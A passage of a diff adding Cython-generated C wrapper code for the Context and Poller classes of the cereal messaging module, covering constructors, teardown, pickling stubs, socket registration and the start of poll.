__Pyx_NumKwargs_VARARGS(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__cinit__", 0))) return -1; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_7Context___cinit__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_7Context___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":121 + * + * def __cinit__(self): + * self.context = cppContext.create() # <<<<<<<<<<<<<< + * + * def term(self): + */ + __pyx_v_self->context = Context::create(); + + /* "cereal/messaging/messaging_pyx.pyx":120 + * cdef cppContext * context + * + * def __cinit__(self): # <<<<<<<<<<<<<< + * self.context = cppContext.create() + * + */ + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":123 + * self.context = cppContext.create() + * + * def term(self): # <<<<<<<<<<<<<< + * del self.context + * self.context = NULL + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_3term(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_7Context_3term = {"term", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_3term, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_3term(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("term (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("term", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "term", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_2term(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_2term(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("term", 0); + + /* "cereal/messaging/messaging_pyx.pyx":124 + * + * def term(self): + * del self.context # <<<<<<<<<<<<<< + * self.context = NULL + * + */ + delete __pyx_v_self->context; + + /* "cereal/messaging/messaging_pyx.pyx":125 + * def term(self): + * del self.context + * self.context = NULL # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __pyx_v_self->context = NULL; + + /* "cereal/messaging/messaging_pyx.pyx":123 + * self.context = cppContext.create() + * + * def term(self): # <<<<<<<<<<<<<< + * del self.context + * self.context = NULL + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":127 + * self.context = NULL + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * pass + * # Deleting the context will hang if sockets are still active + */ + +/* Python wrapper */ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_5__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_5__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_4__dealloc__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_4__dealloc__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_7__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_7Context_7__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_7__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_7__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_6__reduce_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_6__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Context.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_9__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_7Context_9__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_9__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_9__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Context.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_8__setstate_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_8__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Context.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":138 + * cdef list sub_sockets + * + * def __cinit__(self): # <<<<<<<<<<<<<< + * self.sub_sockets = [] + * self.poller = cppPoller.create() + */ + +/* Python wrapper */ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 0, 0, __pyx_nargs); return -1;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_VARARGS(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__cinit__", 0))) return -1; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller___cinit__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":139 + * + * def __cinit__(self): + * self.sub_sockets = [] # <<<<<<<<<<<<<< + * self.poller = cppPoller.create() + * + */ + __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + __Pyx_GOTREF(__pyx_v_self->sub_sockets); + __Pyx_DECREF(__pyx_v_self->sub_sockets); + __pyx_v_self->sub_sockets = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":140 + * def __cinit__(self): + * self.sub_sockets = [] + * self.poller = cppPoller.create() # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __pyx_v_self->poller = Poller::create(); + + /* "cereal/messaging/messaging_pyx.pyx":138 + * cdef list sub_sockets + * + * def __cinit__(self): # <<<<<<<<<<<<<< + * self.sub_sockets = [] + * self.poller = cppPoller.create() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Poller.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":142 + * self.poller = cppPoller.create() + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.poller + * + */ + +/* Python wrapper */ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_3__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_3__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_2__dealloc__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_2__dealloc__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":143 + * + * def __dealloc__(self): + * del self.poller # <<<<<<<<<<<<<< + * + * def registerSocket(self, SubSocket socket): + */ + delete __pyx_v_self->poller; + + /* "cereal/messaging/messaging_pyx.pyx":142 + * self.poller = cppPoller.create() + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.poller + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "cereal/messaging/messaging_pyx.pyx":145 + * del self.poller + * + * def registerSocket(self, SubSocket socket): # <<<<<<<<<<<<<< + * self.sub_sockets.append(socket) + * self.poller.registerSocket(socket.socket) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_5registerSocket(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_6Poller_5registerSocket = {"registerSocket", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_5registerSocket, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_5registerSocket(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_socket = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("registerSocket (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_socket,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_socket)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 145, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "registerSocket") < 0)) __PYX_ERR(0, 145, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_socket = ((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)values[0]); + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("registerSocket", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 145, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Poller.registerSocket", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_socket), __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket, 1, "socket", 0))) __PYX_ERR(0, 145, __pyx_L1_error) + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_4registerSocket(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)__pyx_v_self), __pyx_v_socket); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_4registerSocket(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self, struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_socket) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("registerSocket", 0); + + /* "cereal/messaging/messaging_pyx.pyx":146 + * + * def registerSocket(self, SubSocket socket): + * self.sub_sockets.append(socket) # <<<<<<<<<<<<<< + * self.poller.registerSocket(socket.socket) + * + */ + if (unlikely(__pyx_v_self->sub_sockets == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "append"); + __PYX_ERR(0, 146, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_PyList_Append(__pyx_v_self->sub_sockets, ((PyObject *)__pyx_v_socket)); if (unlikely(__pyx_t_1 == ((int)-1))) __PYX_ERR(0, 146, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":147 + * def registerSocket(self, SubSocket socket): + * self.sub_sockets.append(socket) + * self.poller.registerSocket(socket.socket) # <<<<<<<<<<<<<< + * + * def poll(self, timeout): + */ + __pyx_v_self->poller->registerSocket(__pyx_v_socket->socket); + + /* "cereal/messaging/messaging_pyx.pyx":145 + * del self.poller + * + * def registerSocket(self, SubSocket socket): # <<<<<<<<<<<<<< + * self.sub_sockets.append(socket) + * self.poller.registerSocket(socket.socket) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Poller.registerSocket", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":149 + * self.poller.registerSocket(socket.socket) + * + * def poll(self, timeout): # <<<<<<<<<<<<<< + * sockets = [] + * cdef int t = timeout + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_7poll(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_6Poller_7poll = {"poll", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_7poll, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_7poll(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_timeout = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("poll (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_timeout,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_timeout)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 149, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "poll") < 0)) __PYX_ERR(0, 149, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_timeout = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("poll", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 149, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Poller.poll", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_6poll(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)__pyx_v_self), __pyx_v_timeout); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_6poll(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self, PyObject *__pyx_v_timeout) { + PyObject *__pyx_v_sockets = NULL; + int __pyx_v_t; + std::vector __pyx_v_result; + SubSocket *__pyx_v_s; + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_socket = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + std::vector ::iterator __pyx_t_3; + SubSocket *__pyx_t_4; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("poll", 0); + + /* 